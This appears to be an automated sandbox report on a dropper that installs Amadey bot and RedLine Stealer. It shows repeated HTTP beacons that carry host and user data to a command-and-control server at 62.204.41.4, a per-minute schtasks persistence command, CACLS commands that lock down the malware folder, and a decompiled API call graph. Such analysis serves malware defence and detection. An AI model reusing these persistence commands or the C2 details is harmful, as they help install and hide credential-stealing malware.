                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:07.982109070 CET | 298 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        98 | 192.168.2.5 | 49788 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:11.171370983 CET | 299 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:11.237281084 CET | 300 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        99 | 192.168.2.5 | 49789 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:11.410183907 CET | 300 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:11.474111080 CET | 301 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0



                                                        Target ID:0
                                                        Start time:14:15:22
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\Desktop\file.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\file.exe
                                                        Imagebase:0x10c0000
                                                        File size:598528 bytes
                                                        MD5 hash:61A8C6A50C4A2C2990E45BC223464333
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Target ID:1
                                                        Start time:14:15:22
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                                                        Imagebase:0x1090000
                                                        File size:407040 bytes
                                                        MD5 hash:014BF36C5CA48AF27042E0BAF0B6D951
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 51%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:2
                                                        Start time:14:15:22
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe
                                                        Imagebase:0x400000
                                                        File size:375808 bytes
                                                        MD5 hash:A00A64A5A243C8705D68786C6159E402
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.414193208.00000000005F7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 39%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:3
                                                        Start time:14:15:36
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                        Imagebase:0x7ff73f890000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:4
                                                        Start time:14:15:48
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                        Imagebase:0x7ff73f890000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:7
                                                        Start time:14:16:12
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                        Imagebase:0x790000
                                                        File size:11264 bytes
                                                        MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 82%, ReversingLabs
                                                        Reputation:moderate

                                                        Target ID:8
                                                        Start time:14:16:25
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                        Imagebase:0x170000
                                                        File size:241664 bytes
                                                        MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000008.00000000.443338469.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 81%, ReversingLabs
                                                        Reputation:moderate

                                                        Target ID:9
                                                        Start time:14:16:26
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                                                        Imagebase:0xd80000
                                                        File size:241664 bytes
                                                        MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.827863468.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000009.00000002.827977648.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.827863468.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000009.00000000.445122215.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000003.581791427.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.827863468.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000003.581742963.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000003.581742963.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.827863468.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 81%, ReversingLabs
                                                        Reputation:moderate

                                                        Target ID:10
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                                                        Imagebase:0x1020000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:11
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7fcd70000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:12
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:13
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7fcd70000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:14
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:15
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:CACLS "mnolyk.exe" /P "user:N"
                                                        Imagebase:0xe90000
                                                        File size:27648 bytes
                                                        MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:16
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                                                        Imagebase:0xe90000
                                                        File size:27648 bytes
                                                        MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:17
                                                        Start time:14:16:28
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:18
                                                        Start time:14:16:28
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:CACLS "..\4b9a106e76" /P "user:N"
                                                        Imagebase:0xe90000
                                                        File size:27648 bytes
                                                        MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:19
                                                        Start time:14:16:28
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                                                        Imagebase:0xe90000
                                                        File size:27648 bytes
                                                        MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:20
                                                        Start time:14:16:29
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                        Imagebase:0x1290000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:21
                                                        Start time:14:16:29
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Imagebase:0xd80000
                                                        File size:241664 bytes
                                                        MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000015.00000002.452140965.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000015.00000000.451650195.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security


                                                          Execution Graph

                                                          Execution Coverage:26.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:26.9%
                                                          Total number of Nodes:966
                                                          Total number of Limit Nodes:40
2603 10c2968 GlobalLock 2602->2603 2603->2598 2603->2605 2604 10c2a20 GlobalUnlock 2604->2605 2605->2598 2605->2602 2605->2604 2606 10c2a80 GlobalUnlock 2605->2606 2607 10c2773 2605->2607 2606->2598 2608 10c28b2 2607->2608 2609 10c27a3 CharUpperA CharNextA CharNextA 2607->2609 2611 10c28b7 GetSystemDirectoryA 2608->2611 2610 10c27db 2609->2610 2609->2611 2612 10c28a8 GetWindowsDirectoryA 2610->2612 2613 10c27e3 2610->2613 2614 10c28bf 2611->2614 2612->2614 2619 10c658a CharPrevA 2613->2619 2615 10c28d2 2614->2615 2616 10c658a CharPrevA 2614->2616 2617 10c6ce0 4 API calls 2615->2617 2616->2615 2618 10c28e2 2617->2618 2618->2605 2620 10c2810 RegOpenKeyExA 2619->2620 2620->2614 2621 10c2837 RegQueryValueExA 2620->2621 2622 10c285c 2621->2622 2623 10c289a RegCloseKey 2621->2623 2624 10c2867 ExpandEnvironmentStringsA 2622->2624 2625 10c287a 2622->2625 2623->2614 2624->2625 2625->2623 2627 10c1826 GetProcAddress 2626->2627 2628 10c1890 2626->2628 2630 10c1889 FreeLibrary 2627->2630 2631 10c1839 AllocateAndInitializeSid 2627->2631 2629 10c6ce0 4 API calls 2628->2629 2632 10c189f 2629->2632 2630->2628 2631->2630 2633 10c185f FreeSid 2631->2633 2632->2562 2632->2568 2633->2630 2636 10c468f 7 API calls 2635->2636 2637 10c51f9 LocalAlloc 2636->2637 2638 10c522d 2637->2638 2639 10c520d 2637->2639 2641 10c468f 7 API calls 2638->2641 2640 10c44b9 20 API calls 2639->2640 2642 10c521e 2640->2642 2643 10c523a 2641->2643 2646 10c6285 GetLastError 2642->2646 2644 10c523e 2643->2644 2645 10c5262 lstrcmpA 2643->2645 2647 10c44b9 20 API calls 2644->2647 2648 10c527e 2645->2648 2649 10c5272 LocalFree 2645->2649 2654 10c5223 2646->2654 2650 10c524f LocalFree 2647->2650 2652 10c44b9 20 API calls 2648->2652 2651 10c2f4d 2649->2651 2650->2651 2651->2430 2651->2432 2651->2439 2653 10c5290 LocalFree 2652->2653 2653->2654 2654->2651 2656 10c468f 7 API calls 2655->2656 2657 10c5175 2656->2657 2658 10c517a 2657->2658 2659 10c51af 2657->2659 2660 10c44b9 20 API calls 2658->2660 2661 10c468f 7 API 
calls 2659->2661 2662 10c518d 2660->2662 2663 10c51c0 2661->2663 2662->2436 2822 10c6298 2663->2822 2667 10c51ce 2669 10c44b9 20 API calls 2667->2669 2668 10c51e1 2668->2436 2669->2662 2671 10c468f 7 API calls 2670->2671 2672 10c55c7 LocalAlloc 2671->2672 2673 10c55fd 2672->2673 2674 10c55db 2672->2674 2676 10c468f 7 API calls 2673->2676 2675 10c44b9 20 API calls 2674->2675 2677 10c55ec 2675->2677 2678 10c560a 2676->2678 2679 10c6285 GetLastError 2677->2679 2680 10c560e 2678->2680 2681 10c5632 lstrcmpA 2678->2681 2706 10c55f1 2679->2706 2682 10c44b9 20 API calls 2680->2682 2683 10c564b LocalFree 2681->2683 2684 10c5645 2681->2684 2685 10c561f LocalFree 2682->2685 2686 10c565b 2683->2686 2687 10c5696 2683->2687 2684->2683 2699 10c55f6 2685->2699 2693 10c5467 49 API calls 2686->2693 2688 10c589f 2687->2688 2689 10c56ae GetTempPathA 2687->2689 2690 10c6517 24 API calls 2688->2690 2692 10c56c3 2689->2692 2697 10c56eb 2689->2697 2690->2699 2691 10c6ce0 4 API calls 2694 10c2f7e 2691->2694 2834 10c5467 2692->2834 2696 10c5678 2693->2696 2694->2439 2694->2444 2696->2699 2700 10c5680 2696->2700 2697->2699 2702 10c586c GetWindowsDirectoryA 2697->2702 2703 10c5717 GetDriveTypeA 2697->2703 2699->2691 2701 10c44b9 20 API calls 2700->2701 2701->2706 2868 10c597d GetCurrentDirectoryA SetCurrentDirectoryA 2702->2868 2707 10c5730 GetFileAttributesA 2703->2707 2718 10c572b 2703->2718 2706->2699 2707->2718 2709 10c597d 34 API calls 2709->2718 2710 10c5467 49 API calls 2710->2697 2711 10c2630 21 API calls 2711->2718 2713 10c57c1 GetWindowsDirectoryA 2713->2718 2714 10c658a CharPrevA 2715 10c57e8 GetFileAttributesA 2714->2715 2716 10c57fa CreateDirectoryA 2715->2716 2715->2718 2716->2718 2717 10c5827 SetFileAttributesA 2717->2718 2718->2699 2718->2702 2718->2703 2718->2707 2718->2709 2718->2711 2718->2713 2718->2714 2718->2717 2719 10c5467 49 API calls 2718->2719 2864 10c6952 2718->2864 2719->2718 2721 10c6268 2720->2721 2722 10c6249 2720->2722 2724 10c597d 34 API calls 2721->2724 2723 
10c44b9 20 API calls 2722->2723 2725 10c625a 2723->2725 2726 10c6277 2724->2726 2727 10c6285 GetLastError 2725->2727 2728 10c6ce0 4 API calls 2726->2728 2730 10c625f 2727->2730 2729 10c3013 2728->2729 2729->2439 2729->2451 2730->2726 2732 10c3b2d 2731->2732 2732->2732 2733 10c3b72 2732->2733 2734 10c3b53 2732->2734 2935 10c4fe0 2733->2935 2736 10c6517 24 API calls 2734->2736 2737 10c3b70 2736->2737 2738 10c6298 10 API calls 2737->2738 2739 10c3b7b 2737->2739 2738->2739 2739->2455 2741 10c2622 2740->2741 2742 10c2583 2740->2742 2965 10c24e0 GetWindowsDirectoryA 2741->2965 2743 10c25e8 RegOpenKeyExA 2742->2743 2746 10c258b 2742->2746 2745 10c25e3 2743->2745 2747 10c2609 RegQueryInfoKeyA 2743->2747 2745->2460 2746->2745 2748 10c259b RegOpenKeyExA 2746->2748 2749 10c25d1 RegCloseKey 2747->2749 2748->2745 2750 10c25bc RegQueryValueExA 2748->2750 2749->2745 2750->2749 2752 10c3bdb 2751->2752 2759 10c3bec 2751->2759 2753 10c468f 7 API calls 2752->2753 2753->2759 2754 10c3c03 memset 2754->2759 2755 10c3d13 2756 10c44b9 20 API calls 2755->2756 2784 10c3d26 2756->2784 2757 10c3f4d 2760 10c6ce0 4 API calls 2757->2760 2759->2754 2759->2755 2759->2757 2762 10c3d7b CompareStringA 2759->2762 2764 10c3fab 2759->2764 2767 10c3f1e LocalFree 2759->2767 2768 10c3f46 LocalFree 2759->2768 2771 10c3fd7 2759->2771 2772 10c468f 7 API calls 2759->2772 2774 10c3cc7 CompareStringA 2759->2774 2785 10c3e10 2759->2785 2973 10c1ae8 2759->2973 3013 10c202a memset memset RegCreateKeyExA 2759->3013 3039 10c3fef 2759->3039 2761 10c3f60 2760->2761 2761->2464 2762->2759 2762->2771 2766 10c44b9 20 API calls 2764->2766 2770 10c3fbe LocalFree 2766->2770 2767->2759 2767->2771 2768->2757 2770->2757 2771->2757 3063 10c2267 2771->3063 2772->2759 2774->2759 2775 10c3e1f GetProcAddress 2778 10c3f64 2775->2778 2775->2785 2776 10c3f92 2777 10c44b9 20 API calls 2776->2777 2779 10c3fa9 2777->2779 2780 10c44b9 20 API calls 2778->2780 2781 10c3f7c LocalFree 2779->2781 2782 10c3f75 FreeLibrary 2780->2782 2783 10c6285 
GetLastError 2781->2783 2782->2781 2783->2784 2784->2757 2785->2775 2785->2776 2786 10c3eff FreeLibrary 2785->2786 2787 10c3f40 FreeLibrary 2785->2787 3053 10c6495 2785->3053 2786->2767 2787->2768 2789 10c468f 7 API calls 2788->2789 2790 10c3a55 LocalAlloc 2789->2790 2791 10c3a6c 2790->2791 2792 10c3a8e 2790->2792 2793 10c44b9 20 API calls 2791->2793 2794 10c468f 7 API calls 2792->2794 2795 10c3a7d 2793->2795 2796 10c3a98 2794->2796 2797 10c6285 GetLastError 2795->2797 2798 10c3a9c 2796->2798 2799 10c3ac5 lstrcmpA 2796->2799 2805 10c2f64 2797->2805 2800 10c44b9 20 API calls 2798->2800 2801 10c3b0d LocalFree 2799->2801 2802 10c3ada 2799->2802 2803 10c3aad LocalFree 2800->2803 2801->2805 2804 10c6517 24 API calls 2802->2804 2803->2805 2806 10c3aec LocalFree 2804->2806 2805->2430 2805->2439 2806->2805 2808 10c303c 2807->2808 2808->2439 2810 10c468f 7 API calls 2809->2810 2811 10c417d LocalAlloc 2810->2811 2812 10c41a8 2811->2812 2813 10c4195 2811->2813 2815 10c468f 7 API calls 2812->2815 2814 10c44b9 20 API calls 2813->2814 2817 10c41a6 2814->2817 2816 10c41b5 2815->2816 2818 10c41b9 2816->2818 2819 10c41c5 lstrcmpA 2816->2819 2817->2439 2821 10c44b9 20 API calls 2818->2821 2819->2818 2820 10c41e6 LocalFree 2819->2820 2820->2817 2821->2820 2823 10c171e _vsnprintf 2822->2823 2833 10c62c9 FindResourceA 2823->2833 2825 10c62cb LoadResource LockResource 2826 10c6353 2825->2826 2829 10c62e0 2825->2829 2827 10c6ce0 4 API calls 2826->2827 2828 10c51ca 2827->2828 2828->2667 2828->2668 2830 10c631b FreeResource 2829->2830 2831 10c6355 FreeResource 2829->2831 2832 10c171e _vsnprintf 2830->2832 2831->2826 2832->2833 2833->2825 2833->2826 2835 10c548a 2834->2835 2853 10c551a 2834->2853 2895 10c53a1 2835->2895 2837 10c5581 2841 10c6ce0 4 API calls 2837->2841 2840 10c5495 2840->2837 2844 10c550c 2840->2844 2845 10c54c2 GetSystemInfo 2840->2845 2846 10c559a 2841->2846 2842 10c554d 2842->2837 2851 10c597d 34 API calls 2842->2851 2843 10c553b CreateDirectoryA 2847 10c5577 2843->2847 
